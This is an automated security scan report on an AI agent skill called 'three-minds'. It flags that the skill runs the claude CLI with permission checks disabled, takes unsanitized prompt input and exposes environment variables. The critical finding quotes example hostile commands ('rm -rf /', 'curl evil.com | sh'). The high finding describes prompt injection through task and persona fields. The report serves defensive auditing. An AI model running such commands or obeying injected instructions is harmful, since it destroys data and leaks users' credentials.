Trust Assessment
three-minds received a trust score of 55/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 5 findings: 1 critical, 2 high, 1 medium, and 1 low severity. Key findings include Unpinned npm dependency version, Node lockfile missing, Excessive Permissions and Command Injection via Claude CLI.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 5acc5677). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Excessive Permissions and Command Injection via Claude CLI The `runClaude` function executes the `claude` CLI with the `--dangerously-skip-permissions` flag. This flag allows the underlying AI agent to execute arbitrary commands and access the filesystem without explicit user confirmation. Combined with the fact that the `prompt` and `systemPrompt` (which include user-controlled `task` and `agent.persona` values) are passed directly to the `claude` CLI, this creates a critical command injection vulnerability. A malicious user can craft a `task` or `persona` to instruct the AI agent to execute arbitrary shell commands (e.g., `rm -rf /`, `curl evil.com | sh`) or read/write sensitive files within the `projectDir` (which can also be user-controlled via `--dir`). The `env: { ...process.env }` also exposes all environment variables to the child process, enabling data exfiltration. Remove the `--dangerously-skip-permissions` flag. Implement a robust tool-use permission system that requires explicit user confirmation for sensitive operations (e.g., file writes, command execution). Carefully sanitize or restrict the capabilities of the `claude` agent, especially when processing user-provided prompts or configuration. Consider sandboxing the execution environment for the `claude` agent to limit its blast radius. | LLM | src/council.ts:25 | |
| HIGH | Prompt Injection via User-Controlled Configuration and Task Input The `buildAgentPrompt` and `buildSystemPrompt` functions directly embed user-controlled input into the prompts sent to the `claude` LLM. Specifically, the `task` argument (from CLI) and the `agent.persona` field (from `CouncilConfig`, which can be loaded from a user-provided file via `--config`) are inserted without sanitization. This allows an attacker to inject malicious instructions into the LLM's prompt, potentially overriding its intended behavior, manipulating its responses, or instructing it to perform unintended actions. Given the excessive permissions granted to the `claude` agent (see SS-LLM-005), this prompt injection can directly lead to command injection and data exfiltration. Implement strict input validation and sanitization for all user-provided strings that are incorporated into LLM prompts, especially `task` and `agent.persona`. Consider using a templating engine that escapes special characters or employing a 'defensive prompt' strategy to mitigate injection attempts. Restrict the capabilities of the LLM based on the trustworthiness of the input source. For `agent.persona`, consider pre-defined personas or strict content filtering. | LLM | src/council.ts:64 | |
| HIGH | Data Exfiltration via Environment Variable Exposure The `runClaude` function passes all environment variables of the parent process to the child `claude` process via `env: { ...process.env }`. If a malicious prompt injection (SS-LLM-001) or command injection (SS-LLM-005) is successful, the `claude` agent could be instructed to read and exfiltrate sensitive environment variables (e.g., API keys, cloud credentials, database connection strings) that are present in the parent process's environment. This significantly increases the risk of credential harvesting and unauthorized access. Avoid passing all environment variables to child processes. Instead, explicitly whitelist and pass only the absolutely necessary environment variables required for the `claude` CLI to function. Consider clearing sensitive environment variables before spawning the child process or using a more secure method for passing configuration/credentials if needed. | LLM | src/council.ts:34 | |
| MEDIUM | Unpinned npm dependency version Dependency 'commander' is not pinned to an exact version ('^11.0.0'). Pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/enderfga/three-minds/package.json | |
| LOW | Node lockfile missing package.json is present but no lockfile was found (package-lock.json, pnpm-lock.yaml, or yarn.lock). Commit a lockfile for deterministic dependency resolution. | Dependencies | skills/enderfga/three-minds/package.json |
Scan History
Embed Code
[](https://skillshield.io/report/00ed11a9ef054fac)
Powered by SkillShield